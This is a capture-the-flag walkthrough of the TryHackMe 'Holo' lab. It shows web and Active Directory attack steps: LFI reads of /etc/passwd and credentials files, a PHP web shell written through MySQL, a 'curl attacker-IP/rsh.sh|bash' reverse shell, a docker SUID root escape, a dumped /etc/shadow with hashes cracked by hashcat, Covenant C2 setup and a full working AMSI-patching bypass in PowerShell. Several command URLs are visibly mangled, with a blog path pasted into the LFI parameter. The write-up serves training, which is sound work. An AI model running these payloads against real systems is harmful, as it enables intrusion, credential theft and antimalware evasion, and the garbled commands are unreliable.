- URL: https://tryhackme.com/room/hololive
- Target OS: Linux x 1 / Windows x 5
- Rated Difficulty: Hard
INTRODUCTION
Welcome to Holo!
Holo is an Active Directory and Web Application attack lab that teaches core web attack vectors and advanced/obscure Active Directory attacks along with general red teaming methodology and concepts.
In this lab, you will learn and explore the following topics:
- .NET basics
- Web application exploitation
- AV evasion
- Whitelist and container escapes
- Pivoting
- Operating with a C2 (Command and Control) Framework
- Post-Exploitation
- Situational Awareness
- Active Directory attacks
You will learn and exploit the following attacks and misconfigurations:
- Misconfigured sub-domains
- Local file Inclusion
- Remote code execution
- Docker containers
- SUID binaries
- Password resets
- Client-side filters
- AppLocker
- Vulnerable DLLs
- Net-NTLMv2 / SMB
Task 4 – Flag Submission – Flag Submission Panel
What flag can be found inside of the container?
What flag can be found after gaining user on L-SRV01?
What flag can be found on the Web Application on S-SRV01?
What flag can be found after rooting S-SRV01?
What flag can be found after gaining user on PC-FILESRV01?
What flag can be found after rooting PC-FILESRV01?
What flag can be found after rooting DC-SRV01?
Task 8 – Initial Recon – NOT EVERY GEEK WITH A COMMODORE 64 CAN HACK INTO NASA!
NMAP Initial
❯ nmap -sC -sV -v -p- -oN nmap_initial 10.200.110.0/24
Scanning 2 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.200.110.250
Discovered open port 22/tcp on 10.200.110.33
Discovered open port 80/tcp on 10.200.110.33
❯ sudo nmap -sS -A -v -p- -oN nmap_33 10.200.110.33
# Nmap 7.92 scan initiated Fri Jan 21 19:35:19 2022 as: nmap -sS -A -v -p- -oN nmap_33 10.200.110.33
Nmap scan report for holo.live (10.200.110.33)
Host is up (0.31s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 09:ac:8c:c0:66:5d:3f:70:ff:41:3a:ee:ea:7f:0d:1d (RSA)
| 256 99:83:eb:d1:1a:22:b0:e5:0a:e1:c8:49:0f:6f:43:64 (ECDSA)
|_ 256 e3:0a:77:c1:51:74:e7:26:cc:d0:84:5a:15:55:a7:17 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Did not follow redirect to http://www.holo.live/
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
Uptime guess: 27.394 days (since Sat Dec 25 10:53:33 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 311.86 ms 10.50.107.1
2 312.02 ms holo.live (10.200.110.33)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 21 20:20:50 2022 -- 1 IP address (1 host up) scanned in 2731.66 seconds
What is the last octet of the IP address of the public-facing web server?
How many ports are open on the web server?
What CME is running on port 80 of the web server?
What version of the CME is running on port 80 of the web server?
What is the HTTP title of the web server?
Task 9 – Web App Exploitation – Punk Rock 101 err Web App 101
Gobuster VHOST scan on holo.live
❯ gobuster vhost -u http://holo.live -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://holo.live
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/21 16:20:15 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.holo.live (Status: 200) [Size: 7515]
Found: admin.holo.live (Status: 200) [Size: 1845]
Found: www.holo.live (Status: 200) [Size: 21405]
Found: gc._msdcs.holo.live (Status: 400) [Size: 422]
Found: _domainkey.holo.live (Status: 400) [Size: 422]
What domain loads images on the first web page?
What are the two other domains present on the web server? Format: Alphabetical Order
Task 10 – Web App Exploitation – What the Fuzz?
LOOT >> robots.txt on www holo.live
User-Agent: *
Disallow: /var/www/wordpress/index.php
Disallow: /var/www/wordpress/readme.html
Disallow: /var/www/wordpress/wp-activate.php
Disallow: /var/www/wordpress/wp-blog-header.php
Disallow: /var/www/wordpress/wp-config.php
Disallow: /var/www/wordpress/wp-content
Disallow: /var/www/wordpress/wp-includes
Disallow: /var/www/wordpress/wp-load.php
Disallow: /var/www/wordpress/wp-mail.php
Disallow: /var/www/wordpress/wp-signup.php
Disallow: /var/www/wordpress/xmlrpc.php
Disallow: /var/www/wordpress/license.txt
Disallow: /var/www/wordpress/upgrade
Disallow: /var/www/wordpress/wp-admin
Disallow: /var/www/wordpress/wp-comments-post.php
Disallow: /var/www/wordpress/wp-config-sample.php
Disallow: /var/www/wordpress/wp-cron.php
Disallow: /var/www/wordpress/wp-links-opml.php
Disallow: /var/www/wordpress/wp-login.php
Disallow: /var/www/wordpress/wp-settings.php
Disallow: /var/www/wordpress/wp-trackback.php
ENUM >> img.php found on dev.holo.live
❯ curl -v "http://dev.holo.live/img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../etc/passwd"
* Trying 10.200.110.33:80...
* Connected to dev.holo.live (10.200.110.33) port 80 (#0)
> GET /img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../etc/passwd HTTP/1.1
> Host: dev.holo.live
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 08:40:10 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 982
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false
LOOT >> robots.txt on admin.holo.live
User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt
What file leaks the web server's current directory?
What file loads images for the development domain?
What is the full path of the credentials file on the administrator domain?
Task 12 – Web App Exploitation – What is this? Vulnversity?
LOOT >> LFI to read /var/www/admin/supersecretdir/creds.txt
❯ curl -v "http://dev.holo.live/img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../var/www/admin/supersecretdir/creds.txt"
* Trying 10.200.110.33:80...
* Connected to dev.holo.live (10.200.110.33) port 80 (#0)
> GET /img.php?filhttps://stimpz0r.com/wp-content/uploads/2022/02/../../var/www/admin/supersecretdir/creds.txt HTTP/1.1
> Host: dev.holo.live
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 08:41:00 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Content-Length: 93
<
I know you forget things, so I'm leaving this note for you:
<REDACTED>
- gurag <3
CREDS - /var/www/admin/supersecretdir/creds.txt
What file is vulnerable to LFI on the development domain?
What parameter in the file is vulnerable to LFI?
What file found from the information leak returns an HTTP error code 403 on the administrator domain?
Using LFI on the development domain read the above file. What are the credentials found from the file?
Task 13 – Web App Exploitation – Remote Control Empanadas
ENUM >> RCE found! – dashboard.php on admin.holo.live
What file is vulnerable to RCE on the administrator domain?
What parameter is vulnerable to RCE on the administrator domain?
What user is the web server running as?
Task 15 – Situational Awareness – Docker? I hardly even know her!
Task 16 – Situational Awareness – Living off the LANd
#!/usr/bin/python3
# Minimal TCP connect scanner run from inside the container (no nmap available)
import socket

host = "192.168.100.1"
portList = [21, 22, 53, 80, 443, 3306, 8443, 8080]

for port in portList:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(2)  # do not hang on filtered ports
    try:
        s.connect((host, port))
        print("Port", port, "is open")
    except OSError:
        print("Port", port, "is closed")
    finally:
        s.close()
www-data@7f4902d04e25:/tmp$ ./ps.py
Port 21 is closed
Port 22 is open
Port 53 is closed
Port 80 is open
Port 443 is closed
Port 3306 is open
Port 8443 is closed
Port 8080 is open
What is the Default Gateway for the Docker Container?
What is the high web port open in the container gateway?
What is the low database port open in the container gateway?
Task 16 – Situational Awareness – Dorkus Storkus – Protector of the Database
LOOT >> db_connect.php found in /var/www/admin
<?php
define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "<REDACTED>");
define('DB_USER', '<REDACTED>');
define('DB_NAME', 'DashboardDB');
$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);
if ($connection == false) {
    die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>
CREDS - MySQL database
ENUM >> MySQL server on 192.168.100.1
www-data@739eb495c6aa:/var/www/admin$ mysql -u admin -p -h 192.168.100.1
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.22-0ubuntu0.20.04.2 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| DashboardDB |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)
mysql> use DashboardDB;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-----------------------+
| Tables_in_DashboardDB |
+-----------------------+
| users |
+-----------------------+
1 row in set (0.01 sec)
mysql> show columns from users;
+----------+--------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+----------+--------------+------+-----+---------+-------+
| username | varchar(256) | YES | | NULL | |
| password | varchar(256) | YES | | NULL | |
+----------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)
mysql> select * from users;
+----------+-----------------+
| username | password |
+----------+-----------------+
| <REDACTED> | <REDACTED> |
| gurag | AAAA |
+----------+-----------------+
2 rows in set (0.00 sec)
What is the server address of the remote database?
What is the password of the remote database?
What is the username of the remote database?
What is the database name of the remote database?
What username can be found within the database itself?
Task 18 – Situational Awareness – Making Thin Lizzy Proud
mysql> select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/sh.php';
Query OK, 1 row affected (0.00 sec)
www-data@739eb495c6aa:/var/www/admin$ curl -v "http://192.168.100.1:8080/sh.php?cmd=whoami"
* Trying 192.168.100.1...
* TCP_NODELAY set
* Connected to 192.168.100.1 (192.168.100.1) port 8080 (#0)
> GET /sh.php?cmd=whoami HTTP/1.1
> Host: 192.168.100.1:8080
> User-Agent: curl/7.58.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Fri, 21 Jan 2022 11:29:29 GMT
< Server: Apache/2.4.41 (Ubuntu)
< Content-Length: 9
< Content-Type: text/html; charset=UTF-8
<
www-data
* Connection #0 to host 192.168.100.1 left intact
What user is the database running as?
Task 19 – Situational Awareness – Going%20out%20with%20a%20SHEBANG%21
PRIVESC >> Docker breakout to 192.168.100.1
www-data@739eb495c6aa:/var/www/admin$ curl -v "http://192.168.100.1:8080/sh.php?cmd=curl%20http%3A%2F%2F10.50.107.119%3A8080%2Frsh.sh%7Cbash%20%26"
* Trying 192.168.100.1...
* TCP_NODELAY set
* Connected to 192.168.100.1 (192.168.100.1) port 8080 (#0)
> GET /sh.php?cmd=curl%20http%3A%2F%2F10.50.107.119%3A8080%2Frsh.sh%7Cbash%20%26 HTTP/1.1
> Host: 192.168.100.1:8080
> User-Agent: curl/7.58.0
> Accept: */*
>
❯ nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.50.107.119] from (UNKNOWN) [10.200.110.33] 39190
bash: cannot set terminal process group (2226): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-200-110-33:/var/www/html$ cd ..
www-data@ip-10-200-110-33:/var/www$ cat user.txt
<REDACTED>
FLAG - LSRV-01 user.txt
Task 20 – Privilege Escalation – Call me Mario, because I got all the bits
PRIVESC >> docker has SUID…
www-data@ip-10-200-110-33:/tmp$ /usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh
# whoami
root
# cd /root
# cat root.txt
<REDACTED>
FLAG - L-SRV01 root.txt
What is the full path of the binary with an SUID bit set on L-SRV01?
What is the full first line of the exploit for the SUID bit?
Task 21 – Privilege Escalation – From the Shadows
LOOT >> /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:<REDACTED>:18570:0:99999:7:::
CREDS - linux-admin shadow hash
What non-default user can we find in the shadow file on L-SRV01?
Task 22 – Privilege Escalation – Crack all the Things
Session..........: hashcat
Status...........: Running
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: /root/.hashcat/hashes/shadow.hash
Time.Started.....: Sat Jan 22 01:40:10 2022 (4 mins, 45 secs)
Time.Estimated...: Sat Jan 22 01:54:33 2022 (9 mins, 38 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/content/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 33279 H/s (413.58ms) @ Accel:1024 Loops:512 Thr:128 Vec:1
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9437184/28688768 (32.90%)
Rejected.........: 0/9437184 (0.00%)
Restore.Point....: 4718592/14344384 (32.90%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2560
Candidate.Engine.: Device Generator
Candidates.#1....: pequeñasabandija -> p3KeSn
Hardware.Mon.#1..: Temp: 77c Util:100% Core:1125MHz Mem:5000MHz Bus:16
<REDACTED>:<REDACTED>
CREDS - linux-admin
What is the plaintext cracked password from the shadow hash?
Task 23 – Pivoting – Digging a tunnel to nowhere
- This subject is well covered in TryHackMe >> Wreath (Tasks 8-16) so I will not re-focus on it here.
Task 24 – Command and Control – Command your Foes and Control your Friends
The C2 we will be using in this room will be Covenant
- Covenant Wiki – https://github.com/cobbr/Covenant/wiki
Covenant Installation
- Requires dotnet 3.1 – sudo apt install dotnet-sdk-3.1
- Dotnet install instructions – https://docs.microsoft.com/en-us/dotnet/core/install/linux-ubuntu
- Git clone – git clone --recurse-submodules https://github.com/cobbr/Covenant
- To run – sudo ./dotnet run --project /opt/Covenant/Covenant
- Covenant frontend – http://127.0.0.1:7443
Task 24 – Command and Control – Bug on the Wire
Covenant Listeners
The first step in operating with Covenant is to create a listener. Listeners are built off profiles; you can think of profiles like HTTP requests/pages that will serve as the channel that will handle all C2 traffic. There are four default profiles that Covenant comes with, outlined below.
- CustomHttpProfile – Custom profile that does not require any cookies.
- DefaultBridgeProfile – Default profile for a C2 bridge.
- DefaultHttpProfile – Default HTTP profile.
- TCPBridgeProfile – Default TCP profile for a C2 bridge.
Covenant offers an easy way of editing the listeners along with a GUI. There are many parameters present; we will only be going over a quick overview of each parameter outlined below.
- Name – Name of profile to be used throughout the interface.
- Description – Description of profile and its use cases.
- MessageTransform – Specify how data will be transformed before being placed in other parameters.
- HttpUrls – List of URLs the grunt can call back to.
- HttpRequestHeaders – List of header pairs (name/value) that will be sent with every HTTP request.
- HttpResponseHeaders – List of header pairs (name/value) that will be sent with every HTTP response.
- HttpPostRequest – Format of data when a grunt posts data back to the profile.
- HttpGetResponse – HTTP response when a grunt GETs data from the listener.
- HttpPostResponse – HTTP response when a grunt POSTs data to the listener.
To create a listener, navigate to the Listeners tab from the side menu and select Create Listener.
You will see several options to edit; each option is outlined below.
- Name – (optional) will help to identify different listeners.
- BindAddress – Local address the listener will bind on, usually 0.0.0.0.
- BindPort – Local port the listener will bind on.
- ConnectPort – Port to call back to; suggested to set to 80, 8080, or 8888.
- ConnectAddresses – Addresses for the listener to call back to; the hostname portion of the URL.
- URLs – Callback URLs the grunt will be connected directly back to.
- UseSSL – Determines whether or not the listener uses HTTP or HTTPS.
- SSLCertificate – Certificate used by the listener if SSL is set to true.
- SSLCertificatePassword – Password being used by the SSLCertificate.
- HttpProfile – Profile used by the listener and grunt to determine communication behavior.
To create a basic listener for this network we only suggest editing the Name, ConnectPort, and ConnectAddresses.
Task 25 – Command and Control – The Blood Oath
Covenant Launchers
From the Covenant GitHub, "Launchers are used to generate, host, and download binaries, scripts, and one-liners to launch new Grunts."
There are ten different launchers to choose from within Covenant, each launcher will have its requirements, and some may not be supported on modern operating systems. Launcher types are outlined below.
- Binary – Generates a custom binary to launch a grunt; does not rely on a system binary.
- Shellcode – Converts the binary to shellcode using donut, https://github.com/TheWover/donut
- PowerShell – Generates PowerShell code to launch a grunt using powershell.exe.
- MSBuild – Generates an MSBuild XML file to launch a grunt using msbuild.exe, https://lolbas-project.github.io/lolbas/Binaries/Msbuild/
- InstallUtil – Generates an InstallUtil XML file to launch a grunt using installutil.exe, https://lolbas-project.github.io/lolbas/Binaries/Installutil/
- Mshta – Generates an HTA file to launch a grunt using mshta.exe, https://lolbas-project.github.io/lolbas/Binaries/Mshta/
- Regsvr32 – Generates an SCT file to launch a grunt using regsvr32.exe, https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- Wmic – Generates an XSL file to launch a grunt using wmic.exe, https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- Cscript – Generates a JScript file to launch a grunt using cscript.exe, https://lolbas-project.github.io/lolbas/Binaries/Cscript/
- Wscript – Generates a JScript file to launch a grunt using wscript.exe, https://lolbas-project.github.io/lolbas/Binaries/Wscript/
There are several options for each launcher, with some launchers having specific options. For this task, we will be focusing on the binary launcher and its options. The configuration options are outlined below.
- Listener – Listener the grunt will communicate with.
- ImplantTemplate – Type of implant the launcher will use.
- DotNetVersion – .NET version the launcher will use, dependent on ImplantTemplate.
- Delay – Time the grunt will sleep in between callbacks. A larger delay can aid in stealthy communications.
- JitterPercent – Percent of variability in Delay.
- ConnectAttempts – Number of times the grunt will attempt to connect back to the server before quitting.
- KillDate – Date on which the grunt will quit and stop calling back.
To create a basic launcher for this network, we only suggest editing the Listener and ImplantTemplate.
Task 25 – Command and Control – We ran out of Halo and YAML references…
Covenant Tasks
This task attempts to show how to build a basic task, but then seems to be missing most of the instructions on how to include SharpEDRChecker. Because of this, I have written the basic steps below, and rather than create a Task YAML file manually, we will use Covenant to create it via the frontend.
- Git clone SharpEDRChecker into /opt/Covenant/Covenant/Data/ReferenceSourceLibraries – cd /opt/Covenant/Covenant/Data/ReferenceSourceLibraries && sudo git clone https://github.com/PwnDexter/SharpEDRChecker
- Go to Tasks -> Reference Source Libraries and press + Create
- Enter in the data as in the screenshot below:
NOTE: you may have issues when selecting the ReferenceAssemblies – even if I selected all 8, when I clicked the Edit button to update it would not save them all; just keep selecting them and hitting Edit to save until all 8 are selected.
- The ReferenceAssemblies you need are (ticked only, not necessarily in the order below):
Task 28 – Web App Exploitation – Hide yo’ Kids, Hide yo’ Wives, Hide yo’ Tokens
- On http://10.200.110.31 click the Reset password button
- Enter gurag as the username and press the Reset button
- (Using Firefox) – go to Developer Tools -> Networking and click on the line starting with password_reset.php – click on the Cookies tab and under the Response Cookies section you will find the token named user_token – copy the contents of user_token to your clipboard
- Paste the user_token contents at the end of the address bar after user_token= and hit Enter
- On the next screen, ensure that the username states gurag and hit the Update button… you do not need to set a password
- Success! We get a flag, and now we have a usable login for gurag
FLAG - S-SRV01 web app
NOTE: to get the size of the cookie, in Developer Tools (Firefox) go to Storage -> Cookies -> (S-SRV01 URL) and look at the size column
What user can we control for a password reset on S-SRV01?
What is the name of the cookie intercepted on S-SRV01?
What is the size of the cookie intercepted on S-SRV01?
What page does the reset redirect you to when successfully authenticated on S-SRV01?
Task 30 – AV Evasion – Basically a joke itself…
TryHackMe >> Wreath had a decent explanation of AV Evasion… but zero methods, whereas this room covers it in practical ways. Because of this, the next few sections will be covered in more detail, but for an explanation of AV Evasion go visit TryHackMe >> Wreath, or read the explanations in the room itself.
Although most of the information in the AV Evasion tasks will simply be copy-pasted from the room itself, I will keep it to the basics.
Anti-Malware Scan Interface (AMSI)
The Anti-Malware Scan Interface (AMSI) is a PowerShell security feature that will allow any applications or services to integrate into antimalware products. AMSI will scan payloads and scripts before execution inside of the runtime. From Microsoft, "The Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product that’s present on a machine. AMSI provides enhanced malware protection for your end-users and their data, applications, and workloads."
For more information about AMSI, check out the Windows docs, https://docs.microsoft.com/en-us/windows/win32/amsi/
Find an example of how data flows inside of Windows security features below.
AMSI will send different response codes based on the results of its scans. Find a list of response codes from AMSI below:
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768
AMSI is fully integrated into the following Windows components:
- User Account Control, or UAC
- PowerShell
- Windows Script Host (wscript and cscript)
- JavaScript and VBScript
- Office VBA macros
AMSI is instrumented in both System.Management.Automation.dll and within the CLR itself. When inside the CLR, it is assumed that Defender is already being instrumented; this means AMSI will only be called when loaded from memory.
Task 31 – AV Evasion – THEY WONT SEE ME IF I YELL!
Bypassing AMSI
There are a large number of bypasses for AMSI available, a majority written in PowerShell and C#. Find a list of common bypasses below.
- Patching amsi.dll
- AmsiScanBuffer patch
- Forcing errors
- Matt Graeber's Reflection, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
- PowerShell downgrade
For more information about the variety of bypasses available, check out this GitHub repo, https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
The method we will be looking at is patching amsi.dll, written in PowerShell. This bypass is modified by BC-Security, inspired by Tal Liberman, https://github.com/BC-SECURITY/Empire/blob/master/lib/common/bypasses.py. RastaMouse also has a similar bypass written in C# that uses the same technique, https://github.com/rasta-mouse/AmsiScanBufferBypass/blob/main/AmsiBypass.cs. The bypass will identify DLL locations and modify memory permissions to return undetected AMSI response values.
AMSI bypass – amsi.dll patching
$MethodDefinition = "
    [DllImport(`"kernel32`")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport(`"kernel32`")]
    public static extern IntPtr GetModuleHandle(string lpModuleName);
    [DllImport(`"kernel32`")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
Code breakdown
- The first section of code (lines 3 – 10) will use C# to call in functions from Kernel32 to identify where amsi.dll has been loaded. The inner double quotes must be backtick-escaped so that they do not terminate the PowerShell string.
[DllImport(`"kernel32`")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport(`"kernel32`")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport(`"kernel32`")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
- Once the C# functions are called in, the code will use Add-Type to load the C# and identify the AmsiScanBuffer string in lines 13 – 16. This string can be used to determine where amsi.dll has been loaded and the address location using GetProcAddress.
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
- The next section of code (lines 17 – 23) will modify memory permissions and patch amsi.dll to return a specified value.
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6);
Further reading
For more information about AMSI bypasses, check out the following resources.
- https://offensivedefence.co.uk/posts/making-amsi-jump/
- https://i.blackhat.com/briefings/asia/2018/asia-18-Tal-Liberman-Documenting-the-Undocumented-The-Rise-and-Fall-of-AMSI.pdf
- https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell
- https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/amsi_patch_bin.nim
- https://blog.f-secure.com/hunting-for-amsi-bypasses/
- https://www.contextis.com/us/blog/amsi-bypass
- https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass
- https://amsi.fail/
- https://rastamouse.me/blog/asb-bypass-pt2/
- https://0x00-0x00.github.io/research/20https://stimpz0r.com/wp-content/uploads/2022/02/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
- https://www.youtube.com/watch?v=F_BvtXzH4a4
- https://www.youtube.com/watch?v=lP2KF7_Kwxk
- https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Task 32 – AV Evasion – AMSIception
Obfuscating AMSI bypass code
Generally, AMSI is only looking for weak strings for AMSI bypasses such as AmsiScanBuffer, amsiInitFailed, AmsiUtils, etc. This is where string concatenation can come into play and aid in breaking these string signatures. As EDR solutions and products progress, these signatures and methods may become more robust. Still, these identical signatures have been prevalent for a reasonable amount of time and aren't expected to be changing any time soon for non-commercial products.
